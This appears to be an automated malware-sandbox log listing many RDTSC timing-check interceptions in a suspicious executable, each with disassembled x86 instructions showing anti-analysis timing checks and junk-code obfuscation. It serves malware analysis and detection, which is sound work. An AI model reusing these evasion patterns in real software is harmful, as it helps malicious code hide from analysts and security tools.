Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3FCE second address: 9E3FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C90 second address: 9E5C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4F2B second address: 9E4F39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C94 second address: 9E5D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FC134D1C057h 0x0000000d nop 0x0000000e jmp 00007FC134D1C052h 0x00000013 mov dword ptr [ebp+12461BA3h], ecx 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c mov dword ptr [ebp+122D3793h], edi 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FC134D1C048h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov bx, AD1Ch 0x00000043 cld 0x00000044 xchg eax, esi 0x00000045 push edx 0x00000046 jmp 00007FC134D1C04Fh 0x0000004b pop edx 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5D17 second address: 9E5D20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CDD second address: 9E6CE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CE3 second address: 9E6CF5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CF5 second address: 9E6CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6CF9 second address: 9E6D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FC1350240C8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 cld 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FC1350240C8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D29A4h] 0x00000047 movsx edi, ax 0x0000004a mov ebx, eax 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FC1350240D7h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6D6C second address: 9E6D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jp 00007FC134D1C048h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7D57 second address: 9E7DCF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FC1350240C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245859Dh], edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FC1350240C8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov edi, 6A131476h 0x0000004e push 00000000h 0x00000050 mov edi, 25DCCD45h 0x00000055 xor bh, FFFFFFFBh 0x00000058 xchg eax, esi 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FC1350240D3h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7DCF second address: 9E7DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6FB2 second address: 9E6FB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8E70 second address: 9E8E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9FC6 second address: 9EA032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC1350240C6h 0x00000009 jp 00007FC1350240C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FC1350240C8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D25FEh], eax 0x00000035 mov edi, dword ptr [ebp+122D3882h] 0x0000003b push 00000000h 0x0000003d movzx ebx, bx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007FC1350240C8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d push edi 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E905D second address: 9E9067 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9067 second address: 9E9071 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC1350240CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB097 second address: 9EB09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB09D second address: 9EB0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF7A second address: 9EBF7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB20C second address: 9EB210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBF7F second address: 9EBFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FC134D1C048h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 and edi, dword ptr [ebp+122D2970h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FC134D1C048h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2351h], ebx 0x0000004c push 00000000h 0x0000004e xchg eax, esi 0x0000004f push ecx 0x00000050 jp 00007FC134D1C04Ch 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB210 second address: 9EB21A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ECFC9 second address: 9ECFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC134D1C04Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EC14D second address: 9EC153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EC153 second address: 9EC1E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FC134D1C059h 0x0000000e mov edi, dword ptr [ebp+122D25C1h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push ecx 0x0000001c pushad 0x0000001d call 00007FC134D1C057h 0x00000022 pop esi 0x00000023 jg 00007FC134D1C046h 0x00000029 popad 0x0000002a pop ebx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D2047h], edx 0x00000039 mov ax, bx 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+122D095Dh] 0x00000043 and ebx, 63880B42h 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push esi 0x0000004e call 00007FC134D1C048h 0x00000053 pop esi 0x00000054 mov dword ptr [esp+04h], esi 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc esi 0x00000061 push esi 0x00000062 ret 0x00000063 pop esi 0x00000064 ret 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EC1E7 second address: 9EC1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE0CD second address: 9EE0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE0D1 second address: 9EE0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE0D5 second address: 9EE102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC134D1C054h 0x0000000f jmp 00007FC134D1C04Bh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ED2F2 second address: 9ED2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF238 second address: 9EF23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF347 second address: 9EF355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6961 second address: 9F6971 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC134D1C046h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6971 second address: 9F6975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6975 second address: 9F69B1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC134D1C046h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FC134D1C04Ch 0x00000012 popad 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC134D1C056h 0x0000001a jnc 00007FC134D1C046h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F69B1 second address: 9F69B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9935 second address: 9F9942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FC134D1C046h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9942 second address: 9F996A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007FC1350240CAh 0x00000011 jmp 00007FC1350240D0h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FFBBD second address: 825A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C053h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 067A04EEh 0x00000010 jne 00007FC134D1C04Dh 0x00000016 push dword ptr [ebp+122D0951h] 0x0000001c clc 0x0000001d call dword ptr [ebp+122D1AD4h] 0x00000023 pushad 0x00000024 cmc 0x00000025 xor eax, eax 0x00000027 jne 00007FC134D1C05Dh 0x0000002d jmp 00007FC134D1C057h 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 cld 0x00000037 mov dword ptr [ebp+122D2840h], eax 0x0000003d mov dword ptr [ebp+122D1830h], ecx 0x00000043 mov esi, 0000003Ch 0x00000048 sub dword ptr [ebp+122D1830h], ebx 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 pushad 0x00000053 and ah, 00000079h 0x00000056 jmp 00007FC134D1C055h 0x0000005b popad 0x0000005c lodsw 0x0000005e mov dword ptr [ebp+122D1830h], eax 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 xor dword ptr [ebp+122D1830h], esi 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 jmp 00007FC134D1C04Eh 0x00000077 nop 0x00000078 jo 00007FC134D1C058h 0x0000007e push eax 0x0000007f push edx 0x00000080 jng 00007FC134D1C046h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A053DC second address: A053E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A053E0 second address: A05405 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC134D1C054h 0x00000010 popad 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05405 second address: A0540B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9995BD second address: 9995D1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC134D1C046h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FC134D1C060h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9995D1 second address: 9995ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240D4h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9995ED second address: 9995F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0484F second address: A0485B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A049C9 second address: A049D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04B6C second address: A04B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC1350240CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC1350240CAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04B8D second address: A04B97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04B97 second address: A04B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04E43 second address: A04E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0514C second address: A05152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A069A8 second address: A069AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A069AE second address: A069B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A069B7 second address: A069BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AD79 second address: A0ADB1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC1350240D7h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jo 00007FC1350240C6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f jne 00007FC1350240C6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ADB1 second address: A0ADBB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC134D1C04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ADBB second address: A0ADC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B1D9 second address: A0B204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007FC134D1C058h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jns 00007FC134D1C046h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B204 second address: A0B210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B3C9 second address: A0B3F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Ah 0x00000007 jng 00007FC134D1C046h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC134D1C04Fh 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0BD72 second address: A0BD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240CFh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11BB1 second address: A11BC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FC134D1C046h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10A96 second address: A10A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10A9E second address: A10AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C16 second address: A10C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C1C second address: A10C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1135B second address: A1137F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007FC1350240D6h 0x0000000f jmp 00007FC1350240D0h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1137F second address: A11385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11385 second address: A113A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC1350240D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A113A2 second address: A113AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11638 second address: A1163D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1163D second address: A11658 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC134D1C05Dh 0x00000008 jmp 00007FC134D1C051h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11658 second address: A11663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11663 second address: A1166D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC134D1C046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1166D second address: A11671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11973 second address: A11983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FC134D1C04Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
